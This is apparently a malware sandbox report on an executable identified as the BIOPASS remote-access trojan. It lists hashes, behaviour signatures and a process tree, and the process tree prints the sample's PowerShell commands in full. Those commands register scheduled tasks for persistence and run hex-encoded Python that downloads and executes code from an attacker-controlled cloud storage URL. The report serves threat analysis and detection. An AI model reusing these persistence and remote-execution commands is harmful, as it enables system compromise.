Overview

overview

10

Static

static

10

30d9ffd4b9...be.exe

windows7_x64

10

30d9ffd4b9...be.exe

windows10_x64

10

Analysis

  • max time kernel
    126s
  • max time network
    139s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    12-07-2021 07:12

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    30d9ffd4b92a4ed67569a78ceb25bb6f66346d1c0a7d6d6305e235cbdfe61ebe.exe

  • Size

    4.8MB

  • MD5

    0c858bb12c5eeb59a7add281fc6045be

  • SHA1

    6517cc3d9ad5a6ffc82fce8097070684fa6a6282

  • SHA256

    30d9ffd4b92a4ed67569a78ceb25bb6f66346d1c0a7d6d6305e235cbdfe61ebe

  • SHA512

    096055c770e6f1e1fc1e2993fa565f17cf23b6aa67180662f95aab2adf034cc23baf687c57da74a9a8f85f27883b3f27a6d6edf02a49881b552ad858c3b7f2b6

Score
10/10
biopassdiscoverypersistencerattrojan

Malware Config

Signatures

  • biopass

    BIOPASS is a RAT connected with Winnti group (APT41).

    rattrojanbiopass
  • family_biopass 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 26 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • GoLang User-Agent 3 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 6 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\30d9ffd4b92a4ed67569a78ceb25bb6f66346d1c0a7d6d6305e235cbdfe61ebe.exe
    "C:\Users\Admin\AppData\Local\Temp\30d9ffd4b92a4ed67569a78ceb25bb6f66346d1c0a7d6d6305e235cbdfe61ebe.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3128
    • C:\Windows\system32\ping.exe
      ping www.baidu.com
      2⤵
      • Runs ping.exe
      PID:3568
    • C:\Windows\system32\cmd.exe
      cmd /c "powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(bytes.fromhex(''696d706f72742075726c6c69622e726571756573743b657865632875726c6c69622e726571756573742e75726c6f70656e2875726c6c69622e726571756573742e526571756573742827687474703a2f2f666c617368646f776e6c6f61647365727665722e6f73732d636e2d686f6e676b6f6e672e616c6979756e63732e636f6d2f7265732f63313232322e7478742729292e7265616428292e6465636f6465282929'').decode())\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_SETTINGS',$taskdefinition,6,$null,$null,0,$null);&& SCHTASKS /Run /TN SYSTEM_SETTINGS"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2352
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(bytes.fromhex(''696d706f72742075726c6c69622e726571756573743b657865632875726c6c69622e726571756573742e75726c6f70656e2875726c6c69622e726571756573742e526571756573742827687474703a2f2f666c617368646f776e6c6f61647365727665722e6f73732d636e2d686f6e676b6f6e672e616c6979756e63732e636f6d2f7265732f63313232322e7478742729292e7265616428292e6465636f6465282929'').decode())\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_SETTINGS',$taskdefinition,6,$null,$null,0,$null);
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3008
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Run /TN SYSTEM_SETTINGS
        3⤵
          PID:3556
      • C:\Windows\system32\cmd.exe
        cmd /c "C:\Users\Public\vc.exe /install /quiet /norestart"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3840
        • C:\Users\Public\vc.exe
          C:\Users\Public\vc.exe /install /quiet /norestart
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2244
          • C:\Windows\Temp\{A2327A5C-8DD6-49EA-BB78-2D9C205CD94D}\.cr\vc.exe
            "C:\Windows\Temp\{A2327A5C-8DD6-49EA-BB78-2D9C205CD94D}\.cr\vc.exe" -burn.clean.room="C:\Users\Public\vc.exe" -burn.filehandle.attached=536 -burn.filehandle.self=544 /install /quiet /norestart
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:740
            • C:\Windows\Temp\{E79D847E-F014-4F20-9EA7-A90AF068A264}\.be\VC_redist.x86.exe
              "C:\Windows\Temp\{E79D847E-F014-4F20-9EA7-A90AF068A264}\.be\VC_redist.x86.exe" -q -burn.elevated BurnPipe.{4F9AB522-BA4F-4F40-A682-CE858FFF567D} {88543A56-6F16-42A4-AECA-2108940B7AF9} 740
              5⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Modifies registry class
              PID:3952
      • C:\Windows\system32\cmd.exe
        cmd /c "powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\Silverlight.exe';$action.Arguments = '';$rootFolder.RegisterTaskDefinition('SYSTEM_TEST',$taskdefinition,6,$null,$null,0,$null);&& SCHTASKS /Run /TN SYSTEM_TEST && SCHTASKS /DELETE /F /TN SYSTEM_TEST "
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2852
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\Silverlight.exe';$action.Arguments = '';$rootFolder.RegisterTaskDefinition('SYSTEM_TEST',$taskdefinition,6,$null,$null,0,$null);
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1520
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Run /TN SYSTEM_TEST
          3⤵
            PID:1256
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /DELETE /F /TN SYSTEM_TEST
            3⤵
              PID:3804
          • C:\Windows\system32\cmd.exe
            cmd /c "powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(bytes.fromhex(''696d706f72742075726c6c69622e726571756573743b657865632875726c6c69622e726571756573742e75726c6f70656e2875726c6c69622e726571756573742e526571756573742827687474703a2f2f666c617368646f776e6c6f61647365727665722e6f73732d636e2d686f6e676b6f6e672e616c6979756e63732e636f6d2f7265732f636461656d6f6e2e7478742729292e7265616428292e6465636f6465282929'').decode())\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_CDAEMON',$taskdefinition,6,$null,$null,0,$null);&& SCHTASKS /Run /TN SYSTEM_CDAEMON"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:3648
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(bytes.fromhex(''696d706f72742075726c6c69622e726571756573743b657865632875726c6c69622e726571756573742e75726c6f70656e2875726c6c69622e726571756573742e526571756573742827687474703a2f2f666c617368646f776e6c6f61647365727665722e6f73732d636e2d686f6e676b6f6e672e616c6979756e63732e636f6d2f7265732f636461656d6f6e2e7478742729292e7265616428292e6465636f6465282929'').decode())\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_CDAEMON',$taskdefinition,6,$null,$null,0,$null);
              3⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3540
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Run /TN SYSTEM_CDAEMON
              3⤵
                PID:2456
          • C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe
            C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe -c "exec(bytes.fromhex('696d706f72742075726c6c69622e726571756573743b657865632875726c6c69622e726571756573742e75726c6f70656e2875726c6c69622e726571756573742e526571756573742827687474703a2f2f666c617368646f776e6c6f61647365727665722e6f73732d636e2d686f6e676b6f6e672e616c6979756e63732e636f6d2f7265732f63313232322e7478742729292e7265616428292e6465636f6465282929').decode())" a a
            1⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:1400
          • C:\Windows\system32\vssvc.exe
            C:\Windows\system32\vssvc.exe
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3816
          • \??\c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
            1⤵
            • Checks SCSI registry key(s)
            • Modifies data under HKEY_USERS
            PID:1524
          • C:\Windows\system32\srtasks.exe
            C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3916
          • C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe
            C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe -c "exec(bytes.fromhex('696d706f72742075726c6c69622e726571756573743b657865632875726c6c69622e726571756573742e75726c6f70656e2875726c6c69622e726571756573742e526571756573742827687474703a2f2f666c617368646f776e6c6f61647365727665722e6f73732d636e2d686f6e676b6f6e672e616c6979756e63732e636f6d2f7265732f636461656d6f6e2e7478742729292e7265616428292e6465636f6465282929').decode())" a a
            1⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:3836

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • memory/1520-190-0x000001A7B7500000-0x000001A7B7502000-memory.dmp

            Filesize

            8KB

            Download

          • memory/1520-191-0x000001A7B7503000-0x000001A7B7505000-memory.dmp

            Filesize

            8KB

            Download

          • memory/1520-192-0x000001A7B7506000-0x000001A7B7508000-memory.dmp

            Filesize

            8KB

            Download

          • memory/3008-125-0x000001E76E5F0000-0x000001E76E5F2000-memory.dmp

            Filesize

            8KB

            Download

          • memory/3008-131-0x000001E76E5F6000-0x000001E76E5F8000-memory.dmp

            Filesize

            8KB

            Download

          • memory/3008-126-0x000001E76E5F3000-0x000001E76E5F5000-memory.dmp

            Filesize

            8KB

            Download

          • memory/3008-124-0x000001E76E7E0000-0x000001E76E7E1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/3008-121-0x000001E76E630000-0x000001E76E631000-memory.dmp

            Filesize

            4KB

            Download

          • memory/3540-218-0x00000193AD046000-0x00000193AD048000-memory.dmp

            Filesize

            8KB

            Download

          • memory/3540-209-0x00000193AD040000-0x00000193AD042000-memory.dmp

            Filesize

            8KB

            Download

          • memory/3540-210-0x00000193AD043000-0x00000193AD045000-memory.dmp

            Filesize

            8KB

            Download